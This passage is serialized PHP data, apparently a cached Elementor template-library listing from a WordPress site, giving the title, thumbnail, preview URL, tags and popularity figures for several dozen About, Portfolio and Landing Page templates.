Startup\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2017/03/Startup.png\";s:12:\"tmpl_created\";s:10:\"1488810874\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/about-startup/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:19:\"[\"About\",\"Startup\"]\";s:10:\"menu_order\";s:2:\"26\";s:16:\"popularity_index\";s:1:\"5\";s:11:\"trend_index\";s:1:\"7\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:25;a:14:{s:2:\"id\";s:3:\"143\";s:5:\"title\";s:22:\"About &#8211; Personal\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0010.png\";s:12:\"tmpl_created\";s:10:\"1470820447\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/about-personal/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:20:\"[\"About\",\"Personal\"]\";s:10:\"menu_order\";s:2:\"27\";s:16:\"popularity_index\";s:2:\"15\";s:11:\"trend_index\";s:2:\"20\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:26;a:14:{s:2:\"id\";s:3:\"101\";s:5:\"title\";s:16:\"About &#8211; CV\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0018.png\";s:12:\"tmpl_created\";s:10:\"1470829785\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:98:\"https://library.elementor.com/about-cv/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:77:\"[\"creative portfolio\",\"Personal\",\"portfolio\",\"professional\",\"resume\",\"vcard\"]\";s:10:\"menu_order\";s:2:\"28\";s:16:\"popularity_index\";s:2:\"21\";s:11:\"trend_index\";s:2:\"24\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:27;a:14:{s:2:\"id\";s:3:\"140\";s:5:\"title\";s:25:\"About &#8211; Art Gallery\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0009.png\";s:12:\"tmpl_created\";s:10:\"1470820463\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/about-art-gallery/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:25:\"[\"About\",\"Art\",\"Gallery\"]\";s:10:\"menu_order\";s:2:\"29\";s:16:\"popularity_index\";s:2:\"12\";s:11:\"trend_index\";s:2:\"13\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:28;a:14:{s:2:\"id\";s:3:\"213\";s:5:\"title\";s:26:\"About &#8211; Architecture\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0008.png\";s:12:\"tmpl_created\";s:10:\"1470829766\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/about-architecture/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:24:\"[\"About\",\"Architecture\"]\";s:10:\"menu_order\";s:2:\"30\";s:16:\"popularity_index\";s:2:\"13\";s:11:\"trend_index\";s:2:\"12\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:29;a:14:{s:2:\"id\";s:4:\"2802\";s:5:\"title\";s:38:\"Portfolio &#8211; Fashion Photographer\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2017/11/Fashion-photographer-–-Portfolio.png\";s:12:\"tmpl_created\";s:10:\"1509615440\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/portfolio-fashion-photographer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"31\";s:16:\"popularity_index\";s:2:\"62\";s:11:\"trend_index\";s:3:\"102\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:30;a:14:{s:2:\"id\";s:4:\"2828\";s:5:\"title\";s:35:\"Landing Page &#8211; Law Convention\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2017/11/Law-Convention-–-Landing-Page.png\";s:12:\"tmpl_created\";s:10:\"1509631636\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/landing-page-law-convention/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:35:\"[\"Convention\",\"Landing Page\",\"Law\"]\";s:10:\"menu_order\";s:2:\"32\";s:16:\"popularity_index\";s:2:\"96\";s:11:\"trend_index\";s:3:\"234\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:31;a:14:{s:2:\"id\";s:4:\"1461\";s:5:\"title\";s:28:\"Landing Page &#8211; Ebook 1\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Ebook-1.png\";s:12:\"tmpl_created\";s:10:\"1494352121\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-ebook-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:127:\"[\"App\",\"author\",\"book\",\"brochure\",\"download\",\"e-book\",\"ebook\",\"marketing\",\"product\",\"publisher\",\"sell online\",\"seo\",\"showcase\"]\";s:10:\"menu_order\";s:2:\"33\";s:16:\"popularity_index\";s:2:\"69\";s:11:\"trend_index\";s:3:\"264\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:32;a:14:{s:2:\"id\";s:4:\"1460\";s:5:\"title\";s:28:\"Landing Page &#8211; Ebook 2\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Ebook-2.png\";s:12:\"tmpl_created\";s:10:\"1494352124\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-ebook-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"34\";s:16:\"popularity_index\";s:2:\"66\";s:11:\"trend_index\";s:3:\"197\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:33;a:14:{s:2:\"id\";s:4:\"1459\";s:5:\"title\";s:28:\"Landing Page &#8211; Ebook 3\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Ebook-3.png\";s:12:\"tmpl_created\";s:10:\"1494352125\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-ebook-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"35\";s:16:\"popularity_index\";s:2:\"56\";s:11:\"trend_index\";s:3:\"194\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:34;a:14:{s:2:\"id\";s:4:\"1052\";s:5:\"title\";s:33:\"Landing Page &#8211; Mobile App 1\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2017/03/app.png\";s:12:\"tmpl_created\";s:10:\"1488810873\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/landing-page-mobile-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"36\";s:16:\"popularity_index\";s:2:\"18\";s:11:\"trend_index\";s:2:\"17\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:35;a:14:{s:2:\"id\";s:4:\"1503\";s:5:\"title\";s:33:\"Landing Page &#8211; Mobile App 2\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-app1.png\";s:12:\"tmpl_created\";s:10:\"1494352113\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-mobile-app-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"37\";s:16:\"popularity_index\";s:2:\"55\";s:11:\"trend_index\";s:3:\"110\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:36;a:14:{s:2:\"id\";s:4:\"1504\";s:5:\"title\";s:33:\"Landing Page &#8211; Mobile App 3\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-app2.png\";s:12:\"tmpl_created\";s:10:\"1494352112\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-mobile-app-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"38\";s:16:\"popularity_index\";s:2:\"59\";s:11:\"trend_index\";s:3:\"172\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:37;a:14:{s:2:\"id\";s:4:\"1505\";s:5:\"title\";s:33:\"Landing Page &#8211; Mobile App 4\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-app3.png\";s:12:\"tmpl_created\";s:10:\"1494352110\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-mobile-app-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"39\";s:16:\"popularity_index\";s:2:\"85\";s:11:\"trend_index\";s:3:\"295\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:38;a:14:{s:2:\"id\";s:3:\"726\";s:5:\"title\";s:33:\"Landing Page &#8211; Conference 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2017/01/convention-landing-page.jpg\";s:12:\"tmpl_created\";s:10:\"1485270062\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/landing-page-conference/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"40\";s:16:\"popularity_index\";s:2:\"88\";s:11:\"trend_index\";s:3:\"250\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:39;a:14:{s:2:\"id\";s:4:\"1613\";s:5:\"title\";s:33:\"Landing Page &#8211; Conference 2\";s:9:\"thumbnail\";s:109:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-International-Womens-Day-Conference.png\";s:12:\"tmpl_created\";s:10:\"1494352129\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-conference-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"41\";s:16:\"popularity_index\";s:3:\"100\";s:11:\"trend_index\";s:3:\"249\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:40;a:14:{s:2:\"id\";s:4:\"1612\";s:5:\"title\";s:33:\"Landing Page &#8211; Conference 3\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Tech-Conference.png\";s:12:\"tmpl_created\";s:10:\"1494352127\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-conference-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"42\";s:16:\"popularity_index\";s:3:\"108\";s:11:\"trend_index\";s:3:\"291\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:41;a:14:{s:2:\"id\";s:4:\"1614\";s:5:\"title\";s:33:\"Landing Page &#8211; Conference 4\";s:9:\"thumbnail\";s:99:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Sustainability-Conference.png\";s:12:\"tmpl_created\";s:10:\"1494352131\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-conference-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"43\";s:16:\"popularity_index\";s:2:\"73\";s:11:\"trend_index\";s:3:\"230\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:42;a:14:{s:2:\"id\";s:3:\"906\";s:5:\"title\";s:29:\"Landing Page &#8211;  Coacher\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/02/Landin-Page-Coacher.png\";s:12:\"tmpl_created\";s:10:\"1494352066\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-coacher/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"44\";s:16:\"popularity_index\";s:2:\"50\";s:11:\"trend_index\";s:3:\"137\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:43;a:14:{s:2:\"id\";s:3:\"955\";s:5:\"title\";s:31:\"Landing Page &#8211; Law Office\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2017/02/Landing-Page-Law-Office.png\";s:12:\"tmpl_created\";s:10:\"1494352069\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/landing-page-law-office/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:31:\"[\"Landing Page\",\"Law\",\"Office\"]\";s:10:\"menu_order\";s:2:\"45\";s:16:\"popularity_index\";s:2:\"53\";s:11:\"trend_index\";s:3:\"192\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:44;a:14:{s:2:\"id\";s:3:\"879\";s:5:\"title\";s:41:\"Landing Page &#8211; Financial Consultant\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2017/02/Landing-Page-Financial-consultant.png\";s:12:\"tmpl_created\";s:10:\"1494352064\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/landing-page-financial-consultant/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"46\";s:16:\"popularity_index\";s:2:\"54\";s:11:\"trend_index\";s:3:\"200\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:45;a:14:{s:2:\"id\";s:3:\"926\";s:5:\"title\";s:33:\"Landing Page &#8211; Private Chef\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2017/02/Landing-Page-Private-Chef.png\";s:12:\"tmpl_created\";s:10:\"1494352068\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-private-chef/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"47\";s:16:\"popularity_index\";s:2:\"83\";s:11:\"trend_index\";s:3:\"256\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:46;a:14:{s:2:\"id\";s:3:\"855\";s:5:\"title\";s:37:\"Landing Page &#8211; Personal Trainer\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2017/02/Landing-Page-Personal-Trainer.png\";s:12:\"tmpl_created\";s:10:\"1494352061\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/landing-page-personal-trainer/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"48\";s:16:\"popularity_index\";s:2:\"76\";s:11:\"trend_index\";s:3:\"190\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:47;a:14:{s:2:\"id\";s:3:\"974\";s:5:\"title\";s:28:\"Landing Page &#8211; Stylist\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/03/Landing-Page-Stylist.png\";s:12:\"tmpl_created\";s:10:\"1494352071\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-stylist/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:146:\"[\"cosmetics\",\"fashion\",\"girly\",\"hairdresser\",\"lifestyle\",\"makeup\",\"manicure\",\"pedicure\",\"products\",\"salon\",\"Shop\",\"skincare\",\"stylist\",\"wellness\"]\";s:10:\"menu_order\";s:2:\"49\";s:16:\"popularity_index\";s:2:\"93\";s:11:\"trend_index\";s:3:\"259\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:48;a:14:{s:2:\"id\";s:4:\"1032\";s:5:\"title\";s:27:\"Landing Page &#8211; Agency\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2017/03/Agency.png\";s:12:\"tmpl_created\";s:10:\"1488810866\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/landing-page-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"50\";s:16:\"popularity_index\";s:2:\"71\";s:11:\"trend_index\";s:3:\"306\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:49;a:14:{s:2:\"id\";s:4:\"1634\";s:5:\"title\";s:33:\"Landing Page &#8211; Chiropractor\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Chiropractor.png\";s:12:\"tmpl_created\";s:10:\"1494352119\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-chiropractor/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"51\";s:16:\"popularity_index\";s:2:\"81\";s:11:\"trend_index\";s:3:\"251\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:50;a:14:{s:2:\"id\";s:3:\"730\";s:5:\"title\";s:24:\"Landing Page &#8211; App\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/01/app.-landing-page.jpg\";s:12:\"tmpl_created\";s:10:\"1485273430\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/landing-page-app/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"52\";s:16:\"popularity_index\";s:2:\"70\";s:11:\"trend_index\";s:3:\"220\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:51;a:14:{s:2:\"id\";s:3:\"643\";s:5:\"title\";s:29:\"Landing Page &#8211; Festival\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2016/12/festival.jpg\";s:12:\"tmpl_created\";s:10:\"1481549290\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-festival/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"53\";s:16:\"popularity_index\";s:2:\"64\";s:11:\"trend_index\";s:3:\"247\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:52;a:14:{s:2:\"id\";s:3:\"487\";s:5:\"title\";s:29:\"Landing Page &#8211; Vacation\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0021.png\";s:12:\"tmpl_created\";s:10:\"1477388357\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-vacation/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"54\";s:16:\"popularity_index\";s:2:\"22\";s:11:\"trend_index\";s:2:\"30\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:53;a:14:{s:2:\"id\";s:3:\"542\";s:5:\"title\";s:28:\"Landing Page &#8211; Wedding\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/10/0025.png\";s:12:\"tmpl_created\";s:10:\"1477388484\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-wedding/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"55\";s:16:\"popularity_index\";s:2:\"33\";s:11:\"trend_index\";s:2:\"32\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:54;a:14:{s:2:\"id\";s:4:\"1187\";s:5:\"title\";s:32:\"Landing Page &#8211; Photography\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp1-l.png\";s:12:\"tmpl_created\";s:10:\"1490707385\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/landing-page-photography/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"56\";s:16:\"popularity_index\";s:2:\"24\";s:11:\"trend_index\";s:2:\"23\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:55;a:14:{s:2:\"id\";s:3:\"641\";s:5:\"title\";s:28:\"Landing Page &#8211; Fashion\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2016/12/fashion-landing-page.jpg\";s:12:\"tmpl_created\";s:10:\"1481549264\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-fashion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"57\";s:16:\"popularity_index\";s:2:\"48\";s:11:\"trend_index\";s:3:\"225\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:56;a:14:{s:2:\"id\";s:3:\"189\";s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 1\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0005.png\";s:12:\"tmpl_created\";s:10:\"1470820715\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-tourism/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"58\";s:16:\"popularity_index\";s:1:\"9\";s:11:\"trend_index\";s:1:\"9\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:57;a:14:{s:2:\"id\";s:4:\"1547\";s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 2\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Truism-1.png\";s:12:\"tmpl_created\";s:10:\"1494352115\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"59\";s:16:\"popularity_index\";s:2:\"79\";s:11:\"trend_index\";s:3:\"298\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:58;a:14:{s:2:\"id\";s:4:\"1546\";s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 3\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Truism-2.png\";s:12:\"tmpl_created\";s:10:\"1494352116\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"60\";s:16:\"popularity_index\";s:3:\"101\";s:11:\"trend_index\";s:3:\"112\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:59;a:14:{s:2:\"id\";s:4:\"1545\";s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 4\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Truism-3.png\";s:12:\"tmpl_created\";s:10:\"1494352118\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"61\";s:16:\"popularity_index\";s:2:\"92\";s:11:\"trend_index\";s:3:\"332\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:60;a:14:{s:2:\"id\";s:4:\"2714\";s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 5\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2017/11/Vacation-–-Landing-Page.png\";s:12:\"tmpl_created\";s:10:\"1509631782\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:2:\"62\";s:16:\"popularity_index\";s:3:\"113\";s:11:\"trend_index\";s:3:\"245\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:61;a:14:{s:2:\"id\";s:4:\"1190\";s:5:\"title\";s:26:\"Landing Page &#8211; 